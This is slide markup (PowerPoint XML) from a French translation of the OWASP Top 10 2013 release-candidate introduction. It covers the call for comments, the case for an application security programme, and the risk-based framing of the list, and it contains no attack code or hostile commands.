        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RC</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02459143"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="2956560"/>
          <a:ext cx="5657968" cy="4739640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5657968"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Appel à Commentaires</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0">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270344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000" kern="1200" baseline="0" noProof="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>L’OWASP prévoit une diffusion publique de la version finale du Top 10 OWASP 20013 en Avril ou Mai 2013 après une période de prise en compte des remarques se terminant Mars 2013. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Cette version du Top 10 de l'OWASP marque la dixième année de ce projet de sensibilisation à l'importance des risques de sécurité des applications. Cette publication fait suite à la mise à jour de 2010 qui ciblait les risques, détaillant les menaces, attaques, faiblesses, contrôles de sécurité ainsi que les impacts techniques et métier associés à chaque risque. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>En utilisant cette approche, nous pensons fournir un modèle permettant aux entreprises de penser au-delà des dix risques présentés, et comprendre les risques les plus importants que créent leurs applications pour leur métier.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Suite à la publication finale du Top 10 2013 de l'OWASP, la collaboration de la communauté OWASP se poursuivra pour mise à jour des documents de référence, wiki y compris, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>OWASP Developer’s Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>, OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Testing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t> Guide, OWASP Code </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Review</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t> Guide, et la série des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Cheat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Sheet</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t> (Aide-mémoires).</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Tout commentaire constructif sur ce Top 10 OWASP 2013  RC1 doit être envoyée par email à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>OWASP-TopTen@lists.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. Les commentaires privés doivent être envoyée à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>dave.wichers@owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. Les commentaires anonymes sont bienvenus. Tous les commentaires non-privés serons rencensés et publiés en même temps que la publication finale. Les commentaires recommandant des modifications relatives aux éléments listés dans le Top 10 doivent inclure une liste complète de 10 éléments suggérés, accompagné d’une justification pour chaque modification. Tous les commentaires devront indiquer la page et la section concernée.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Vos commentaires sont essentiels à la réussite du Projet OWASP Top 10. Merci à tous pour votre dévouement à l’amélioration de la sécurité logicielle pour tout le monde.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Jeff Williams, Créateur et Co-auteur du projet OWASP Top 10</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Dave Wichers, Leader du projet OWASP Top 10</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65346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418328705"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143001"/>
          <a:ext cx="6858000" cy="8046718"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="380999">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Lancez dès maintenant un programme de sécurisation des applications</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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766571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000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>La sécurité des applications n'est plus une option. Entre le nombre croissant des agressions et la pression des autorités de régulation, les entreprises du web doivent se donner les moyens de sécuriser leurs applications. Etant donné le nombre écrasant de lignes de code déjà en production qui sont autant de risques de vulnérabilité, beaucoup d‘entreprises luttent déjà pour en reprendre le contrôle. L'OWASP leur recommande de mettre en place un plan global qui profite à l'ensemble de leurs services.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Mais pour mener à bien cette sécurisation des applications, il faut une synergie de toutes les composantes de l‘entreprise: la sécurité, la qualité, les développeurs, les commerciaux et la direction. La sécurité doit être mise en avant, de telle sorte que tous les acteurs puissent la retrouver dans leurs directives de travail et l'appliquer.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Il faut aussi mettre l'accent sur les méthodes qui vont effectivement améliorer la sécurité et leurs effets attendus en terme et de diminution de risque, mais aussi de coût. Les éléments clefs de la sécurisation des applications sont:</a:t>
                      </a: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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> faire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>entreprise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>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+O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1763227221"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="2990125"/>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997157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675992406"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6934200" cy="8046720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6934200"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Il s’agit de Risques, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>non de faiblesses</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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766572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000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Même si les</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> versions antérieures du </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Top </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent4"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent4"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>se focalisaient essentiellement sur les “vulnérabilités” les plus communes, le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>a toujours été organisé autour des risques. Ceci a causé une confusion compréhensible pour les personnes recherchant une classification infaillible des failles.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Le Top 10 OWASP de 2010 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>a clarifié</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>le rôle central du risque au sein du Top 10 en</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>étant très explicite sur la façon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> dont les agents de menace, vecteurs d’attaque, vulnérabilités, impacts techniques et impacts métier se combinent pour </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>générer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> le risque. Cette version du Top 10 OWASP suit la même méthodologie.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="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fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>La méthodologie d’évaluation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> du risque pour le Top 10 est basée sur </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>l’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t> Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
